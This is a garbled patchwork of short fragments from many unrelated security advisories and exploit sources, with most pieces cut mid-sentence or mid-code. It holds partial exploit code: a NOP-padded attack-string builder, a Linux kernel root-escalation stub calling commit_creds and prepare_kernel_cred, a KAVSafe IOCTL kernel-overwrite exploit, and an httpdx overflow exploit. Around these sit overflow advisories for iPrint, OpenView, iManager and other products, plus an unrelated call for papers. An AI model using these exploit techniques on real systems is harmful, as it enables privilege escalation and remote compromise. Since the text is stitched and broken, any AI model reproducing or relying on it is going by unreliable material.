/******************************************************************************/
/* */
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */
/* */
/* Feel free to modify this code as you like, as long as you include the */
/* above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* Cisco bug ID: CSCin95836 */
Let's look at the code:
"./src/modules/proxy/proxy_util.c"
long int ap_proxy_send_fb(BUFF *f, request_rec *r, cache_req *c, off_t len, int nowrite, int chunked, size_t recv_buffer_size)
{
...
size_t buf_size;
long remaining = 0;
iPrint Client, which can be exploited by malicious people to
compromise a user's system.
1) A boundary error in the Novell iPrint ActiveX control (ienipp.ocx)
when handling the "GetDriverFile()" method can be exploited to cause a
stack-based buffer overflow by passing an overly long string as the
third argument.
2) Two boundary errors in the Novell iPrint ActiveX control
(ienipp.ocx) when constructing a URI based on input to the
"GetPrinterURLList()" and "GetPrinterURLList2()" methods can be
use this payload
# put retFix in our attack string
attackString = fixRet
print "\t[*] added fixRet function; attackString is " + str(len(attackString)) + " bytes long"
# append enough NOPs to hit either the beginning of the payload or the location of ret
if len(payload) <= afterRetSize + 4: # payload will not occupy any space before ret
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int getroot(void)
POC:
#include <windows.h>
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
BREG_DELETE_KEY BRegDeleteKey = NULL;
...
...
while(1) {
/* added f:m:o: byMin */
opt = getopt_long(argc, argv,
"vhrxtglpo:i:c:s:b:Q:na:f:m:46", long_options, NULL);
if(opt == -1)
break;
switch(opt) {
Kavsafe.sys creates a device called \Device\KAVSafe and handles the DeviceIoControl request with IoControlCode = 0x830020d4, which can overwrite arbitrary kernel module data
EXPLOIT CODE:
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
httpdx web server 1.4 is vulnerable to a remote buffer overflow using long GET requests such as http://www.example.com/aaa=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
The vulnerability lies in httpdx_src/http.cpp in h_handlepeer() : strcpy(index,client->filereq);
Other versions may also be vulnerable.
Exploit (0day) (Tested with httpdx 1.4 on WinXP SP3)
#include <stdio.h>
#include <stdlib.h>
Node Manager, which can be exploited by malicious people to compromise
a vulnerable system.
1) Various boundary errors in the OpenView5.exe CGI application when
processing parameters can be exploited to cause stack-based buffer
overflows via HTTP requests to the CGI application with overly long
parameter strings.
2) A boundary error in ov.dll can be exploited to cause a stack-based
buffer overflow by e.g. sending an HTTP request to the OpenView5.exe
CGI application with an overly long parameter string.
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
Description of Vulnerability:
-------------------------------------------------------------------------------------
Vpopmail and QmailAdmin are prone to several integer overflows because
numeric types with a larger range are needed to store users' quotas
nowadays. Using an integer is not enough, because it overflows when the
user has more than 2 gigabytes in his/her mailbox; furthermore, a long
integer is not the solution either, because on 32-bit machines a long
integer has the same range as an integer.
$salt = wp_generate_password();
update_option('secret', $salt);
}
}
// $salt is a seven char long password. $secret_key is null.
return apply_filters('salt', $secret_key . $salt);
}
The wp_salt()'s value is stored here:
[in] VARIANT URL,
[in] VARIANT hostName,
[in] VARIANT localFile,
[in] VARIANT remoteFile,
[in] VARIANT fdxCookie,
[in] long isSecure,
[in] long isUpload,
[in] int portNo,
[in] long isAscii,
[in] long shouldPerformMD5,
[in] long isCheckpointRestart,
0000000013rxrLogin~~administrator
The single argument ("administrator") is copied into a buffer of size
0x1AC on the stack using wsprintfW; however, no string length checks are
performed. By sending an overly long username as part of the first
authentication request, an exploitable condition is reached.
Vulnerability 2: Authentication Password Overflow
Another stack-based buffer overflow exists within the authentication
Application: Soldat
http://www.soldat.pl
Versions: game <= 1.4.2 and dedicated server <= 2.6.2
Platforms: Windows (Linux not affected)
Bugs: A] clients crash caused by too long strings on the screen
B] denial of service through file transfer port
C] easy IP banning
Exploitation: remote
A] versus clients
B] versus server (Windows only)
############################################
Safari for windows Long link DoS
Vendor URL: http://www.apple.com/safari/
Advisory: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified: Yes    Exploit available: YES
############################################
Safari is vulnerable to a DoS via a very long link.
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
Papers reporting original and unpublished research results on above and
any other related topics are solicited. Submission should include a
cover page with authors' names, affiliations, addresses, fax and phone
numbers, and email addresses. Include up to 6 keywords from the above
list and an abstract of no more than 300 words. Authors can submit
their contribution as a short or long contribution:
Short paper: it should present ongoing work of the researchers in order
to communicate and share their current ideas with the community. It
could also present new extended results of a previously published
paper. Short papers should not exceed 4 pages in length in
classes, under the 'Schema' menu. The class name is intended to have a
maximum length of 32 characters. This limitation is enforced on the
client side by setting a 'maxlength' property with a value of 32 in
the proper form field, but no verification is performed on the server
side to ensure that the user-defined class name is, at most, 32
characters long. By tampering with the POST request that sends the class
name when creating a new class, an authenticated user can define an
overly long class name that will cause a stack-based buffer overflow
on the iManager web server, making it possible for the attacker to
overwrite return addresses and Structured Exception Handlers, allowing
the execution of arbitrary code with the privileges of the current
Manager, which can be exploited by malicious people to compromise a
user's system.
1) A boundary error in the parsing of file names inside torrent files
can be exploited to cause a heap-based buffer overflow via an overly
long file name.
2) Two boundary errors when parsing names from torrent files can be
exploited to cause stack-based buffer overflows via overly long file
names.
D-Link DIR-100 long url filter evasion
scip AG Vulnerability ID 3808 (09/08/2008)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808
I. INTRODUCTION
D-Link DIR-100 is a small and cost-effective router and firewall device
for small offices and home users. More details are available at the
official product web site (German link):
Remarkably, we can access this interface anonymously via
"ncacn_ip_tcp". The following is the IDL of the function of opnum
0x10A:
/* opcode: 0x156, address: 0x28EB1C00 */
long sub_28EB1C00 (
[in] handle_t arg_1,
[in][string] char * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
user's system.
1) A boundary error in the EML reader (emlsr.dll) when parsing certain
headers ("To:", "Cc:", "Bcc:", "From:", "Date:", "Subject:",
"Priority:", "Importance:", and "X-MSMail-Priority:") in EML files can
be exploited to cause a heap-based buffer overflow via an overly long
string.
2) A boundary error in the EML reader (emlsr.dll) when encountering the
beginning of RFC2047 encoded-words in headers can be exploited to cause
a heap-based buffer overflow via an overly long string.
interface is identified by 506b1890-14c8-11d1-bbc3-00805fa6962e v1.0.
Opnum 0x10d specifies the vulnerable operation within this interface.
Function 0x10d's IDL is as follows:
long sub_28EA5F70 (
[in] handle_t arg_1,
[in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
Dreambox DM500 webserver long URL request denial of service
scip AG Vulnerability ID 3807 (08/29/2008)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3807
I. INTRODUCTION
Dreambox is a Linux-based DVB satellite, terrestrial and cable digital
television decoder (set-top box), produced by German multimedia vendor
Dream Multimedia.